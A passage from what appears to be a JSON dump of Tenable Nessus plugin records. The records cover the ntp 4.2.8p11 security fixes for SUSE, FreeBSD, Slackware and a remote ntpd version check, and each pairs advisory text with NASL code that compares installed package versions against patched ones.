value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debuginfo-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debugsource-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-doc-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T02:55:13", "description": "Network Time Foundation reports :\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\n\nThis release addresses five security issues in ntpd :\n\n- LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\nvulnerability: ephemeral association attack\n\n- INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909 : ctl_getitem():\nbuffer read overrun leads to undefined behavior and information leak\n\n- LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\nephemeral associations\n\n- LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric\nmode cannot recover from bad state\n\n- LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909 : Unauthenticated\npacket can reset authenticated interleaved association\n\none security issue in ntpq :\n\n- MEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909 : ntpq:decodearr() can\nwrite beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-28T00:00:00", "title": "FreeBSD : ntp -- multiple vulnerabilities (af485ef4-1c58-11e8-8477-d05099c0ae8c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ntp-devel", "p-cpe:/a:freebsd:freebsd:ntp"], "id": "FREEBSD_PKG_AF485EF41C5811E88477D05099C0AE8C.NASL", "href": "https://www.tenable.com/plugins/nessus/107046", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107046);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"FreeBSD\", value:\"SA-18:02.ntp\");\n\n script_name(english:\"FreeBSD : ntp -- multiple vulnerabilities (af485ef4-1c58-11e8-8477-d05099c0ae8c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Network Time Foundation reports :\n\nThe NTP Project at Network Time Foundation is releasing ntp-4.2.8p11.\n\nThis release addresses five security issues in ntpd :\n\n- LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil\nvulnerability: ephemeral association attack\n\n- INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909 : ctl_getitem():\nbuffer read overrun leads to undefined behavior and information leak\n\n- LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\nephemeral associations\n\n- LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric\nmode cannot recover from bad state\n\n- LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909 : Unauthenticated\npacket can reset authenticated interleaved association\n\none security issue in ntpq :\n\n- MEDIUM: Sec 3414 / CVE-2018-7183 / VU#961909 : ntpq:decodearr() can\nwrite beyond its buffer limit\n\nand provides over 33 bugfixes and 32 other improvements.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?706c32c8\"\n );\n # https://vuxml.freebsd.org/freebsd/af485ef4-1c58-11e8-8477-d05099c0ae8c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ab8935d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.8p11\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ntp-devel>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:45:47", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\n - Fix systemd migration in %pre (bsc#1034892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "title": "SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1464-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1464-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1464-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110224);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1464-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\n - Fix systemd migration in %pre (bsc#1034892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181464-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e3d0c93\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1000=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debuginfo-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debugsource-4.2.8p11-46.26.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-doc-4.2.8p11-46.26.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:20:14", "description": "The version of the remote NTP server is 4.x prior to 4.2.8p11. It is,\ntherefore, affected by multiple vulnerabilities, which allow denial of\nservice attacks, information disclosure and possibly, remote code\nexecution.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-09T00:00:00", "title": "Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_4_2_8P11.NASL", "href": "https://www.tenable.com/plugins/nessus/107258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107258);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2016-1549\",\n \"CVE-2018-7170\",\n \"CVE-2018-7182\",\n \"CVE-2018-7183\",\n \"CVE-2018-7184\",\n \"CVE-2018-7185\"\n );\n script_bugtraq_id(\n 88200,\n 103191,\n 103192,\n 103194,\n 103339\n );\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for a vulnerable NTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote NTP server is 4.x prior to 4.2.8p11. It is,\ntherefore, affected by multiple vulnerabilities, which allow denial of\nservice attacks, information disclosure and possibly, remote code\nexecution.\");\n # https://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eda86736\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to NTP version 4.2.8p11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7183\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\napp_name = \"NTP Server\";\n\nport = get_kb_item(\"Services/udp/ntp\");\nif (empty_or_null(port)) port = 123;\n\nversion = get_kb_item_or_exit(\"Services/ntp/version\");\nif (version == 'unknown') audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nmatch = pregmatch(string:version, pattern:\"([0-9a-z.]+)\");\nif (isnull(match) || empty_or_null(match[1])) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\n# Paranoia check\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = match[1];\nverfields = split(ver, sep:\".\", keep:FALSE);\nmajor = int(verfields[0]);\nminor = int(verfields[1]);\nif ('p' >< verfields[2])\n{\n revpatch = split(verfields[2], sep:\"p\", keep:FALSE);\n rev = int(revpatch[0]);\n patch = int(revpatch[1]);\n}\nelse\n{\n rev = verfields[2];\n patch = 0;\n}\n\n# This vulnerability affects NTP 4.x < 4.2.8p11\n# Check for vuln, else audit out.\nif (\n (major == 4 && minor < 2) ||\n (major == 4 && minor == 2 && rev < 8) ||\n (major == 4 && minor == 2 && rev == 8 && patch < 11)\n)\n{\n fix = \"4.2.8p11\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nreport =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\nsecurity_report_v4(\n port : port,\n proto : \"udp\",\n extra : report,\n severity : SECURITY_HOLE\n);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:12:06", "description": "New ntp packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 25, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : ntp (SSA:2018-060-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-060-02.NASL", "href": "https://www.tenable.com/plugins/nessus/107103", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-060-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107103);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_xref(name:\"SSA\", value:\"2018-060-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : ntp (SSA:2018-060-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.511203\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88e126a0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n 